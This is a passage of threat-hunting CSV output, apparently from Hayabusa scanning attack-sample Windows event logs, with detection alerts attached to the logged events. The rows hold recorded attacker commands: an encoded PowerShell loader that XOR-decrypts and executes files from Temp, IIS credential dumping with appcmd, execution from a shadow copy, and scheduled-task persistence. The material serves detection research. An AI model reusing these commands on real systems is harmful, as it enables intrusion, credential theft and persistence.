EwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". 
)"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8
AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c 
whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create 
""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: 
C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 
+2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: 